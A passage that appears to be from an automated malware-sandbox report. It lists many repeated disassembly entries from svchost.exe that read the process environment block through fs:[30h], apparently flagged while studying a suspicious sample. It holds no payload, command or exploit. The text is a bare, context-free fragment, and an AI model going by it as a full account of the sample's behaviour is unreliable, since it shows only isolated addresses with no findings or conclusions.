                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
